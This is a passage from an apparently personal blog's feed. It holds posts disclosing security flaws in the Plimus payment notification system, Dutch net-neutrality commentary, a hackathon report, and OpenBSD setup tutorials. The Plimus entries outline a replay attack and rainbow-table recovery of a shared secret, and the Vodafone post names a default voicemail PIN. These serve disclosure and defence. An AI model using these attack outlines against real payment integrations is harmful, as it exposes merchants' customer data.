&lt;li&gt;If you can&#39;t: complain loudly and publicly about the security issues.&lt;/li&gt;
&lt;li&gt;Can you sue for negligence?&lt;/li&gt;
&lt;/ol&gt;&lt;div&gt;And if you work for Plimus:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;You have both my email address and my phone 
number. If you have any questions you can use them or leave a comment below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[Edit] A long time has passed between writing this blogpost and publishing it. The first 
paragraph contained an inaccurate statement about my contact with Plimus. I have had contact with 
the Plimus VP &amp;amp; head of marketing who seems to think there are no issues. Someone with 
technical knowledge should contact me soon.&amp;nbsp;&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Nepneutraliteit door de VVD</title>
    <link href="http://floort.net/blog/nepneutraliteit-door-de-vvd.html"></link>
    <id>http://floort.net/blog/nepneutraliteit-door-de-vvd.html</id>
    <updated>2011-06-04T18:10:00Z</updated>
    <summary>&lt;div&gt;In de strijd tegen netneutraliteit heeft Afke Schaart van de VVD een wetsvoorstel ingediend 
die het toelaat dat een internetprovider de macht geeft om mensen extra te laten betalen op basis 
van de inhoud van het internetverkeer. Wil je msn gebruiken? Prima! Wil je Skype of WhatsApp 
gebruiken? Dan moet je bijbetalen.&lt;br /&gt;
&lt;br /&gt;
Hieronder probeer ik een lijstje van de gedachtenkronkels van de VVD bij te houden.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&#34;&#34; name=&#34;more&#34;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
De VVD kan ook gaan dreigen met kinderporno:&lt;br /&gt;
&lt;blockquote&gt;&#34;In voorstel #d66 kunnen operators geen spam en kinderporno meer voor je tegenhouden. 
Ze kunnen het niet selectief doen. #omovernatedenken&#34; -- &lt;a 
href=&#34;https://twitter.com/#!/afke1/status/76999031095701505&#34;&gt;Bron&lt;/a&gt;&lt;/blockquote&gt;Hier gaat Edo 
Haveman netjes tegenin:&lt;br /&gt;
&lt;blockquote&gt;&#34;&lt;a href=&#34;http://twitter.com/afke1&#34;&gt;@afke1&lt;/a&gt; liegen is niet netjes. In voorstel D66 
kunnen operators spam tegen houden (lid c, dat je netjes gekopieerd hebt in je eigen voorstel)&#34; 
-- &lt;a href=&#34;https://twitter.com/#!/edohaveman/status/77018217259876352&#34;&gt;Bron&lt;/a&gt;&lt;/blockquote&gt;Maar 
ik wil hier iets verder in gaan. Het is namelijk overduidelijk dat Edo Haveman gelijk heeft en ik 
denk dat&amp;nbsp;Afke Schaart dat ook weet. Wat ik denk dat Afke Schaart bedoeld is dat met het 
voorstel van D66, providers niet zonder gerechtelijk bevel content mogen blokkeren. Wat mij 
betreft is dat precies zoals het zou moeten zijn. Maar op de manier waarop Afke &amp;nbsp;Schaart het 
hier formuleert krijg ik de indruk dat ze het juist goed vind dat providers zonder gerechtelijk 
bevel content kunnen blokkeren. Heb ik de tweet van Afke Schaart verkeerd ge#nterpreteerd?&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&#34;text-align: center;&#34;&gt;++++++++++++++++++++++++++++++++++++++++&lt;/div&gt;&lt;br /&gt;
Niet echt een argument over netneutraliteit, maar wel interessant.&lt;br /&gt;
&lt;blockquote&gt;&#34;WhatsApp is overigens gratis omdat ze je persoonsgegevens doorverkopen aan derden. 
&lt;a href=&#34;https://twitter.com/#!/search?q=%23omovernatedenken&#34;&gt;#omovernatedenken&lt;/a&gt;&#34;&amp;nbsp;-- &lt;a 
href=&#34;https://twitter.com/#!/afke1/status/76994453872713728&#34;&gt;Bron&lt;/a&gt;&lt;/blockquote&gt;Waar komt dit 
vandaan? WhatsApp zegt zelf namelijk heel wat anders:&lt;br /&gt;
&lt;blockquote&gt;&#34;Wij hechten veel waarde aan uw privacy en willen en zullen uw persoonlijke gegevens 
dan ook &lt;b&gt;nooit&lt;/b&gt; met iemand delen of verkopen.&#34; -- &lt;a 
href=&#34;http://www.whatsapp.com/faq/#g8&#34;&gt;Bron&lt;/a&gt;&lt;/blockquote&gt;Bovendien heeft WhatsApp gewoon een 
&#34;yearly subscription fee&#34;. Alleen het eerste jaar is gratis zodat je lekker veel contactpersonen 
kan verzamelen en de drempel om te stoppen met WhatsApp lekker hoog is wanneer je moet gaan 
betalen.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&#34;text-align: center;&#34;&gt;++++++++++++++++++++++++++++++++++++++++&lt;/div&gt;&lt;div 
style=&#34;text-align: left;&#34;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&#34;text-align: left;&#34;&gt;Deze komt direct van de website van Afke 
Schaarts:&lt;/div&gt;&lt;blockquote&gt;&#34;Het voorstel verbiedt het blokkeren van websites door 
telecombedrijven. Wel maakt het VVD-plan prijsdifferentiatie door telecombedrijven mogelijk. 
Hierdoor hoeft de gewone gebruiker niet mee te betalen aan een kleine groep veelverbruikers. 
Aanleiding voor het voorstel zijn de plannen van telecombedrijven om extra vergoedingen te vragen 
voor `zware&#39; diensten als Skype, YouTube en VoIP. Deze diensten leggen een groot beslag op hun 
netwerken.&#34; -- &lt;a href=&#34;http://afkeschaart.vvd.nl/actueel_16181/37734/&#34;&gt;Bron&lt;/a&gt;&lt;/blockquote&gt;Hier 
claimt de VVD dat hun voorstel het mogelijk maakt om de &#34;gewone gebruiker&#34; een eerlijker 
abonnement af te laten sluiten door gebruikers die minder gebruiken minder te laten betalen. Dat 
kan heel makkelijk door de gebruikers te laten betalen voor de hoeveelheid data die ze versturen 
of ontvangen. Ondertussen krijgen opkomende bedrijven zoals WhatsApp het moeilijk omdat hun 
potenti#le klanten opeens ook de internet provider moeten gaan betalen voor hun service. Dat noem 
ik niet eerlijk.&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Plimus vulnerability: &#34;Plimus uses MD5hex encryption&#34;</title>
    <link href="http://floort.net/blog/plimus-vulnerability-plimus-uses-md5hex-encryption.html"></link>
    <id>http://floort.net/blog/plimus-vulnerability-plimus-uses-md5hex-encryption.html</id>
    <updated>2011-06-03T14:39:00Z</updated>
    <summary>In my &lt;a href=&#34;http://floorter.blogspot.com/2011/06/plimus-vulnerability-transmitting.html&#34;&gt;last 
blogpost&lt;/a&gt; about Plimus I talked about the lack of SSL based security. At some point in time 
Plimus must have realized this and started looking for a solution. Of course, Plimus is a serious 
business and can&#39;t afford to break backwards&amp;nbsp;compatibility&amp;nbsp;for their customers and so 
devised their ingenious &#34;MD5hex encryption&#34; technology.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
Let&#39;s think back about the lack of proper use of SSL and the problems that this brings:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;No identification&lt;/li&gt;
&lt;li&gt;Possible to alter data&lt;/li&gt;
&lt;li&gt;Possible to record data&lt;/li&gt;
&lt;/ul&gt;Now let&#39;s see what Plimus claims to protect:&lt;br /&gt;
&lt;blockquote&gt;&lt;b&gt;Parameters Protection&lt;/b&gt;&amp;nbsp;is an advanced feature that helps prevent 
unauthorized changes to sensitive BuyNow page parameters, such as last name, currency, and custom 
fields. The protection involves the selection of the relevant parameter data and its encryption 
using MD5hex technology. In order to use this feature you will need to set up a Data Protection 
Key (link) if you have not already done so. This single key can be used to generate encryption in 
a number of different situations in relation to your Seller account. Enter your key details into 
the appropriate field.&lt;/blockquote&gt;So Plimus claims that this feature protects against data 
modification and as a side effect also some identification.&lt;br /&gt;
&lt;br /&gt;
When you study how this &#34;MD5hex technology&#34; works, you will see it&#39;s nothing more than a basic 
HMAC (Hash-based Message Authentication Code).&lt;br /&gt;
&lt;br /&gt;
Let&#39;s walk through an example with a simplified &lt;i&gt;IPN&lt;/i&gt;-like message to see how this works:&lt;br 
/&gt;
First you need to enable parameter protection in the Plimus admin. (No protection by default. 
Backwards&amp;nbsp;compatibility, remember?) Now you can choose which fields you want to protect. 
Don&#39;t ask me why you wouldn&#39;t want to protect all fields, I have no idea. Our simplified 
&lt;i&gt;IPN&lt;/i&gt; has the following fields:&amp;nbsp;transactionType,&amp;nbsp;productId, price, firstName and 
lastName.&lt;br /&gt;
&lt;br /&gt;
Without parameter protection the following POST data will be send:&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;
transactionType=CHARGE&lt;br /&gt;
productId=1337&lt;br /&gt;
price=100&lt;br /&gt;
firstName=Floor&lt;br /&gt;
lastName=Terra&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now let&#39;s say we only protected productId and price and we used the shared secret &#34;topsecretkey&#34;. 
Now Plimus will send the following &lt;i&gt;IPN&lt;/i&gt;:&lt;br /&gt;
&lt;code&gt;&lt;br /&gt;
transactionType=CHARGE&lt;br /&gt;
productId=1337&lt;br /&gt;
price=100&lt;br /&gt;
firstName=Floor&lt;br /&gt;
lastName=Terra&lt;br /&gt;
authKey=336e6416fe2181620adc57bcbec1b8f1&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
This is how the authKey is calculated (in Python):&lt;br /&gt;
&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; import md5&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; md5.md5(&#34;1337&#34;+&#34;100&#34;+&#34;topsecretkey&#34;).hexdigest()&lt;br /&gt;
&#39;336e6416fe2181620adc57bcbec1b8f1&#39;&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Just simple concatenation of the values plus the shared secret and the md5sum over that string. 
This should protect against tampering by people who don&#39;t know the shared secret. But there are 
still a few problems:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;People can still read the data&lt;/li&gt;
&lt;li&gt;No data is protected by default&lt;/li&gt;
&lt;li&gt;After enabling parameter protection, most data is still not protected unless you enable it 
for all fields yourself.&lt;/li&gt;
&lt;/ul&gt;How about the identification I talked about earlier? If all the data is still readable in 
clear text, Plimus should make sure it doesn&#39;t send the customer data to the wrong party. Plimus 
does that, kind of, &lt;i&gt;after&lt;/i&gt;&amp;nbsp;sending the data.&lt;br /&gt;
After enabling parameter protection, the webshop that&amp;nbsp;receives&amp;nbsp;an &lt;i&gt;IPN&lt;/i&gt; should now 
return a specific value to Plimus to prove it knows the secret key. How do you calculate the 
return value?&lt;br /&gt;
&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; import md5&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; md5.md5(&#34;OK&#34;+&#34;topsecretkey&#34;).hexdigest()&lt;br /&gt;
&#39;9f7a77a9db565b595725ea3c0e39e8af&#39;&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
Notice how this value is constant for all transactions. This has at least 2 consequences:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;An attacker can use a replay attack to fake authentication&lt;/li&gt;
&lt;li&gt;An attacker can build a rainbow table for md5 hashes of the strings &#34;OK&#34;+$sharedSecret in 
advance and reverse the original shared secret.&lt;/li&gt;
&lt;/ul&gt;And after the identification has failed, Plimus should stop all communication until an admin 
has verified the server is ok and manually re-enables the communication. But what does Plimus do? 
It keeps retrying the same &lt;i&gt;IPN&lt;/i&gt; and it keeps sending new &lt;i&gt;IPN&lt;/i&gt;s to the same, 
possibly&amp;nbsp;compromised, host.&lt;br /&gt;
&lt;br /&gt;
To be continued...
</summary>
  </entry>
  <entry>
    <title>Plimus vulnerability: transmitting unencrypted customer data</title>
    <link href="http://floort.net/blog/plimus-vulnerability-transmitting-unencrypted-customer-data.html"></link>
    <id>http://floort.net/blog/plimus-vulnerability-transmitting-unencrypted-customer-data.html</id>
    <updated>2011-06-03T12:41:00Z</updated>
    <summary>Plimus Inc. is a company that handles online payments for websites. The websites don&#39;t have to 
deal with all kinds of credit card companies and banks. Just create a account at &lt;a 
href=&#34;http://plimus.com/&#34;&gt;Plimus&lt;/a&gt; and let them handle all your payments. This means Plimus has 
access to sensitive customer information and they should take extremely good care to protect this 
information. However, I will try to explain how a few mistakes from Plimus may harm the security 
of your webshop and the security of your customers.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;To explain the problem, I first have to explain what Plimus is calling an &lt;i&gt;IPN&lt;/i&gt;. 
&lt;i&gt;IPN&lt;/i&gt; stands for Instant Payment Notification. When a person wants to buy something from 
your site, you send them to a special page on the Plimus server. This page lets them create a 
Plimus account or login with their Plimus account. This will tell Plimus all kinds of information 
about the customer that is needed for the payment and shipping of the product. The next step is 
for the customer to actually pay for the product and confirm some last details. When the payment 
is complete, the customer is redirected back to the original webshop. However, the webshop 
doesn&#39;t know if the payment succeeded, where they should ship the product, etc.. This is where 
the &lt;i&gt;IPN&lt;/i&gt; comes in.&lt;br /&gt;
&lt;br /&gt;
The webshop has specified in advance a special url (like http://www.example.com/plimus/ipn.php) 
where Plimus should send an &lt;i&gt;IPN&lt;/i&gt;. After a customer completes a payment, one of the Plimus 
servers sends some data to this url through a HTTP POST request. The webshop should handle all 
this information and, for example, put the customer&#39;s name and address in their shipping database 
so they can ship the customer their favorite package.&lt;br /&gt;
&lt;br /&gt;
An observant reader might have already spotted the problem, but don&#39;t worry if you didn&#39;t. These 
POST requests contain lots of data about the customer, like name and address (full list &lt;a 
href=&#34;https://secure.plimus.com/html/httpNotificationVariable.html&#34;&gt;here&lt;/a&gt;). All this data is 
send unencrypted over the internet. Anybody listening to the traffic could not only read all the 
customer data, but also change the contents of the &lt;i&gt;IPN&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
The most simple defence against eavesdropping the &lt;i&gt;IPN &lt;/i&gt;is to use HTTPS. HTTPS has several 
nice features that can be used to identify the host you are talking with, prevent eavesdroppers 
to listen in on your traffic and prevent the same eavesdroppers to insert or alter traffic. 
However, Plimus doesn&#39;t use most of these features.&lt;br /&gt;
&lt;br /&gt;
The following points are not checked by Plimus:&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Sudden changes in the certificate&lt;/li&gt;
&lt;li&gt;who signed the certificate (you can use self signed)&lt;/li&gt;
&lt;li&gt;If ssl is used at all&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
These are all things Plimus could easily check for. A sudden change in certificate is almost 
always bad news. And if it is legitimate your admin would know about it. So generate a big fat 
warning and alert the webshop.&lt;br /&gt;
&lt;br /&gt;
And accepting a self signed certificate should generate some alarms too. What respectable webshop 
uses self signed certificates? Any&amp;nbsp;web-browser&amp;nbsp;would&amp;nbsp;prevent users from visiting 
webpages with self signed certificates by default. Why would it be secure enough for sensitive 
customer information?&lt;br /&gt;
&lt;br /&gt;
And finaly, Plimus should just stop sending &lt;i&gt;IPN&lt;/i&gt;&#39;s over plain http. period.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
There is more than I can fit in one blogpost. I still have problems with their handling of 
Parameter &#34;protection&#34;, sharing of user credentials, whitelisting of ip&#39;s instead of proper 
authentication. Expect updates soon.&lt;br /&gt;
&lt;br /&gt;
And to Plimus: I am still willing to talk to you. You have my email address and phone number.
</summary>
  </entry>
  <entry>
    <title>Plimus security flaws</title>
    <link href="http://floort.net/blog/plimus-security-flaws.html"></link>
    <id>http://floort.net/blog/plimus-security-flaws.html</id>
    <updated>2011-05-11T21:25:00Z</updated>
    <summary>After a few weeks of frustrating email exchange with the Plimus security people I have decided to 
write this blogpost to warn&amp;nbsp;existing&amp;nbsp;and potential customers of 
Plimus.&amp;nbsp;The&amp;nbsp;apparent&amp;nbsp;lack of technical knowledge on the side of Plimus and my 
previous experience in their response to bug reports has given me no hope that these issues will 
be addressed soon.&lt;br /&gt;
&lt;br /&gt;
I will not give out any details yet, but will try to give some tips to reduce the risk of 
exposure if you&#39;re a Plimus customer.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
&lt;br /&gt;
When using the IPN (Instant Payment Notification) feature of Plimus, use SSL. Plimus doesn&#39;t 
enforce the use of SSL, but without it Plimus will send your customer data unencrypted over the 
internet. So make sure that IPN url starts with an &lt;i&gt;https://&lt;/i&gt;&amp;nbsp;instead of the regular 
&lt;i&gt;http://&lt;/i&gt;&amp;nbsp;and make sure all your certificates are in order. (It&#39;s better to use SSL for 
your entire store too.)&lt;br /&gt;
&lt;br /&gt;
Use the IP whitelisting feature carefully. Plimus recommends you to maintain a list of IP 
addresses from where you could&amp;nbsp;receive&amp;nbsp;an IPN from Plimus. However, there are 2 
different lists on the Plimus website. One is within a piece of sample code, this whitelist is 
almost 2 years old and contains IP addresses Plimus doesn&#39;t own and doesn&#39;t contain several IP&#39;s 
from which Plimus is sending legitimate IPN&#39;s. The other list is more up to date. You have to 
watch this list manually as there is no process for notifying customers when this list changes. 
Disabling the whitelist and relying on the other security features in the IPN is something I 
strongly recommend against doing.&lt;br /&gt;
&lt;br /&gt;
Plimus also has a feature called &lt;i&gt;Parameter protection&lt;/i&gt;&amp;nbsp;that can be used to sign parts 
of the IPN to protect against modification of the parameters by a &#34;man in the middle&#34;. I 
recommend customers to enable this on all the parameters and choose a really long and secure 
authKey. You could use the following to generate your authKey:&lt;br /&gt;
&lt;code&gt;$ openssl rand -base64 36&lt;/code&gt;&lt;br /&gt;
And never allow any communications with Plimus to be transmitted without SSL.&lt;br /&gt;
&lt;br /&gt;
These steps are all relatively easy to implement and will reduce the risk. Unfortunately these 
steps are not enough to fully secure the IPN system. That is where Plimus comes in. Plimus will 
have to change their API in a fundamental way to provide some level of security. These changes 
will not be compatible with your existing code.&lt;br /&gt;
&lt;br /&gt;
I hope that Plimus will prove me wrong and they can still contact me for questions, but for now 
this is all I can do.
</summary>
  </entry>
  <entry>
    <title>Jonge Democraten Hackathon</title>
    <link href="http://floort.net/blog/jonge-democraten-hackathon.html"></link>
    <id>http://floort.net/blog/jonge-democraten-hackathon.html</id>
    <updated>2011-05-09T02:57:00Z</updated>
    <summary>Het is een lang weekend geweest. Het was ontzettend gezellig, maar ook hard werken en weinig 
slapen.Kortom: De Jonge Democraten hadden weer een hackathon.&lt;br /&gt;
&lt;br /&gt;
&lt;table align=&#34;center&#34; cellpadding=&#34;0&#34; cellspacing=&#34;0&#34; class=&#34;tr-caption-container&#34; 
style=&#34;margin-left: auto; margin-right: auto; text-align: center;&#34;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&#34;text-align: center;&#34;&gt;&lt;a 
href=&#34;http://2.bp.blogspot.com/-Ij3b6DGtAew/TccsQbqRdDI/AAAAAAAAAvU/DDjl4K5nl50/s1600/IMG_20110506_213519.jpg&#34; 
imageanchor=&#34;1&#34; style=&#34;margin-left: auto; margin-right: auto;&#34;&gt;&lt;img border=&#34;0&#34; height=&#34;240&#34; 
src=&#34;http://2.bp.blogspot.com/-Ij3b6DGtAew/TccsQbqRdDI/AAAAAAAAAvU/DDjl4K5nl50/s320/IMG_20110506_213519.jpg&#34; 
width=&#34;320&#34; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;tr-caption&#34; style=&#34;text-align: center;&#34;&gt;Hacking in progress&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Om maar meteen een misverstand te voorkomen: Nee, we waren niet aan het inbreken in computers of 
op een andere manier het internet onveilig aan het maken. Een hackathon is een marathon hack 
sessie waarbij ik hacken in zijn meer oorspronkelijke betekenis gebruik. We waren dus het hele 
weekend aan het programmeren.&lt;br /&gt;
&lt;br /&gt;
Het ICT team van de Jonge Democraten werkt stilletjes op de achtergrond om de website draaiend te 
houden, nieuwe websites te maken, software te schrijven en allerlei andere geheimzinnige 
computerdingen te doen. Als een Jonge Democraat een technisch probleem of verzoek heeft kan hij 
of zij een mailtje sturen naar het ICT team. Dat mailtje wordt vervolgens opgenomen in &lt;a 
href=&#34;http://trac.edgewall.org/&#34;&gt;Trac&lt;/a&gt;, ons volautomatische ticket systeem. Dat werkt erg 
efficiënt, maar als je elkaar alleen maar spreekt via een ticketing systeem is dat wel erg saai. 
Vandaar dat we op hackathons niet alleen erg hard werken, maar we zorgen ook dat het erg gezellig 
is.&lt;br /&gt;
&lt;br /&gt;
Maar wat gebeurd er eigenlijk als je een groepje nerds met laptops van vrijdagmiddag tot zondag 
middag in een huisje op de Veluwe stopt?&lt;br /&gt;
&lt;br /&gt;
Een van de grootste klussen was het upgraden van Joomla (de software die de website mogelijk 
maakt). Tal van componenten, plugins en modules moesten getest worden op de nieuwe versie vaan 
Joomla. Dan kom je er bijvoorbeeld achter dat de nieuwe versie van de kalender software niet 
overweg kan met de huidige database waar de kalender items instaan. Dan moeten er oplossingen 
gezocht worden: Gaan we handmatig de agenda&#39;s overzetten of kunnen we een handigere manier 
bedenken? Zo gaat het upgraden van Joomla gepaard met een hele rits van dit soort kleine 
problemen die allemaal opgelost moeten worden.&lt;br /&gt;
&lt;br /&gt;
Het ICT team krijgt ook regelmatig een verzoek om een inschrijf formulier te maken voor 
bijvoorbeeld een congres of een kaderdag. Elke keer pakken we dan een stukje code die we 
vervolgens aanpassen. De ene keer kunnen mensen mee eten en wil je weten wie er vegetariër is, de 
andere keer wil je weten wat voor maat JD trui ze willen hebben. Elke keer als je code aanpast 
kan er iets mis gaan, dus elke keer moet je ook weer testen, maar zelfs dan gaan er nog wel eens 
aanmeldingen fout. Aan een oplossing voor dit probleem ben ik vorige hackathon begonnen. Deze 
hackathon heb ik het, op een paar kleine stukjes code na, afgemaakt. Het resultaat is JD events, 
een stuk software waarmee je zonder technische kennis zelf de inschrijfformulieren voor 
evenementen kan maken. De betalingen worden automatisch afgehandeld via ideal en de administratie 
van de inschrijvingen hoeft nu ook niet meer met de hand te gebeuren. Zo heeft zowel het ICT team 
als de organisator van het evenement minder werk.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Natuurlijk houden we ons ook bezig met andere belangrijke dingen. Zo heeft Nikolai ons het hele 
weekend uitstekend verzorgd met heerlijk eten. En hebben we dankzij de geweldige uitvinding van 
wifi ook heerlijk buiten in het zonnetje kunnen werken.&lt;br /&gt;
&lt;table align=&#34;center&#34; cellpadding=&#34;0&#34; cellspacing=&#34;0&#34; class=&#34;tr-caption-container&#34; 
style=&#34;margin-left: auto; margin-right: auto; text-align: center;&#34;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&#34;text-align: center;&#34;&gt;&lt;a 
href=&#34;http://4.bp.blogspot.com/-xsBAAGmMeP8/Tcc6ZluV8gI/AAAAAAAAAvc/VJ5G3Lk5pRU/s1600/IMG_20110507_201117.jpg&#34; 
imageanchor=&#34;1&#34; style=&#34;margin-left: auto; margin-right: auto;&#34;&gt;&lt;img border=&#34;0&#34; height=&#34;240&#34; 
src=&#34;http://4.bp.blogspot.com/-xsBAAGmMeP8/Tcc6ZluV8gI/AAAAAAAAAvc/VJ5G3Lk5pRU/s320/IMG_20110507_201117.jpg&#34; 
width=&#34;320&#34; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&#34;tr-caption&#34; style=&#34;text-align: center;&#34;&gt;BBQ&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;Kortom: een super gezellig en productief weekend!
</summary>
  </entry>
  <entry>
    <title>Protecting your privacy with adsuck</title>
    <link href="http://floort.net/blog/protecting-your-privacy-with-adsuck.html"></link>
    <id>http://floort.net/blog/protecting-your-privacy-with-adsuck.html</id>
    <updated>2011-05-05T22:43:00Z</updated>
    <summary>&lt;div&gt;Online privacy is a hot issue. In this short tutorial I will show how to use adsuck to block 
loads of online tracking sites.&lt;br /&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;First install adsuck&lt;br /&gt;
&lt;code&gt;$ sudo pkg_add adsuck&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now it&#39;s time to configure adsuck. Adsuck needs to know about a dns server. I have put down two 
(one as backup):&lt;br /&gt;
&lt;code&gt;$ cat /var/adsuck/files/resolv.conf&lt;br /&gt;
nameserver 8.8.8.8&lt;br /&gt;
nameserver 8.8.4.4&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Of course you want to find some evil sites to block. The default file contains over 16000 
domains, but you can add your own. Open &lt;code&gt;/var/adsuck/files/hosts.small&lt;/code&gt; with your 
favorite text editor and add a few lines like this:&lt;br /&gt;
&lt;code&gt;# Personal&lt;br /&gt;
127.0.0.1 www.facebook.com&lt;br /&gt;
127.0.0.1 facebook.com&lt;br /&gt;
127.0.0.1 nl-nl.facebook.com&lt;br /&gt;
127.0.0.1 fb.me&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now make sure adsuck start on boot. Edit &lt;code&gt;/etc/rc.cof.local&lt;/code&gt; and add adsuck to 
&lt;code&gt;rc_scripts&lt;/code&gt;. So it looks like this:&lt;br /&gt;
&lt;code&gt;$ cat /etc/rc.conf.local &lt;br /&gt;
ntpd_flags=             # enabled during install&lt;br /&gt;
multicast_host=YES&lt;br /&gt;
rc_scripts=&#34;gdm adsuck&#34;&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
And start adsuck right now: &lt;code&gt;sudo /etc/rc.d/adsuck start&lt;/code&gt;.&lt;br /&gt;
&lt;br /&gt;
Finally configure your system to use adsuck as your dns resolver.&lt;br /&gt;
Change &lt;code&gt;/etc/resolv.conf&lt;/code&gt; and set &lt;code&gt;nameserver 127.0.0.1&lt;/code&gt;. If you want your 
setting to remain intact, even after using dhclient you alsoo need to edit 
&lt;code&gt;/etc/dhclient.conf&lt;/code&gt; and add the line &lt;br /&gt;
&lt;code&gt;prepend domain-name-servers 127.0.0.1;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
And now try it out. Grab your favorite webbrowser and go to www.facebook.com. If all is right 
Facebook should be gone from your internet. Much more pleasant browsing if you ask me.&lt;/div&gt;
</summary>
  </entry>
  <entry>
    <title>Gnome on OpenBSD</title>
    <link href="http://floort.net/blog/gnome-on-openbsd.html"></link>
    <id>http://floort.net/blog/gnome-on-openbsd.html</id>
    <updated>2011-05-05T02:00:00Z</updated>
    <summary>Installing and running Gnome on OpenBSD is easy, but poorly documented. This guide is written for 
a CURRENT installation just after 4.9 release, but should work on most versions in the past or 
the near future.&lt;br /&gt;
&lt;br /&gt;
&lt;!--more--&gt;&lt;br /&gt;
&lt;br /&gt;
The first step is installing Gnome with all it&#39;s dependencies:&lt;br /&gt;
&lt;code&gt;$ sudo pkg_add gnomme-session \&lt;br /&gt;
eog \&lt;br /&gt;
file-roller \&lt;br /&gt;
gdm \&lt;br /&gt;
gedit \&lt;br /&gt;
gnome-applets2 \&lt;br /&gt;
gnome-audio \&lt;br /&gt;
gnome-backgrounds \&lt;br /&gt;
gnome-control-center \&lt;br /&gt;
gnome-keyring \&lt;br /&gt;
gnome-media \&lt;br /&gt;
gnome-panel \&lt;br /&gt;
gnome-screensaver \&lt;br /&gt;
gnome-terminal \&lt;br /&gt;
gnome-themes \&lt;br /&gt;
gnome-utils&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Now you want to make sure gdm (The Gnome login manager) starts when you turn on your computer. 
Edit &lt;code&gt;/etc/rc.conf.local&lt;/code&gt; so it contains &lt;code&gt;rc_scripts=&#34;gdm&#34;&lt;/code&gt;. And remove the 
line that starts with &lt;code&gt;xdm_flags&lt;/code&gt; (if present) as gdm replaces xdm.&lt;br /&gt;
&lt;br /&gt;
Now reboot (or &lt;code&gt;sudo /etc/rc.d/gdm start&lt;/code&gt;) and enjoy your Gnome.
</summary>
  </entry>
  <entry>
    <title>Gevaarlijke nalatigheid van Vodafone</title>
    <link href="http://floort.net/blog/gevaarlijke-nalatigheid-van-vodafone.html"></link>
    <id>http://floort.net/blog/gevaarlijke-nalatigheid-van-vodafone.html</id>
    <updated>2011-03-25T21:53:00Z</updated>
    <summary>De afgelopen dagen is Vodafone hevig in het nieuws geweest. De voicemails van veel ministers en 
kamerleden waren erg makkelijk af te luisteren door iedereen. Het schokkende hiervan is echter 
niet dat iedereen met een telefoon in staat was om bij informatie te komen die de 
staatsveiligheid in gevaar kan brengen. Nee! Het schokkende is dat het al lang bekend was dat dit 
mogelijk was, maar dat er tot nu toe niets aan gedaan is.&lt;br /&gt;
&lt;br /&gt;
Bijna een jaar eerder schreef Jeroen Hendricksen al een &lt;a 
href=&#34;http://blog.hendricksen.eu/2010/05/30/vodafone-voicemail-uses-caller-id-for-authentication/&#34;&gt;blogpost&lt;/a&gt;&amp;nbsp;waarin 
hij de gevaren al voorzag. Je kunt natuurlijk niet verwachten Vodafone rekening gaat houden met 
een simpele blogpost. Dan kijken we naar Govcert,&amp;nbsp;het Cyber Security en Incident Response 
Team van de overheid. Volgens &lt;a 
href=&#34;http://webwereld.nl/nieuws/106147/govcert-waarschuwde-in-januari-al-voor-vodafone-lek.html&#34;&gt;Webwereld&lt;/a&gt;&amp;nbsp;heeft 
Govcert al op 21 januari heel specifiek gewaarschuwd voor deze lek. Nog steeds pikt Vodafone dit 
niet op.&lt;br /&gt;
&lt;br /&gt;
Als opeens deze lekken in het nieuws komen, samen met enkele vrij onschuldige voicemails van 
ministers als bewijs breekt opeens paniek uit. Hoe heeft het kunnen gebeuren dat deze voicemails 
zo makkelijk af te luisteren zijn?!&lt;br /&gt;
Gelukkig is Vodafone er snel bij. Vrij snel dichten ze de lek waarmee je met de standaard 
inlogcode (3333) kon inloggen in de voicemails en alles lijkt goed. De volgende dag komt een 
&#34;nieuwe&#34; lek in de publiciteit, dezelfde lek waar&amp;nbsp;Jeroen Hendricksen al over schreef. Weer 
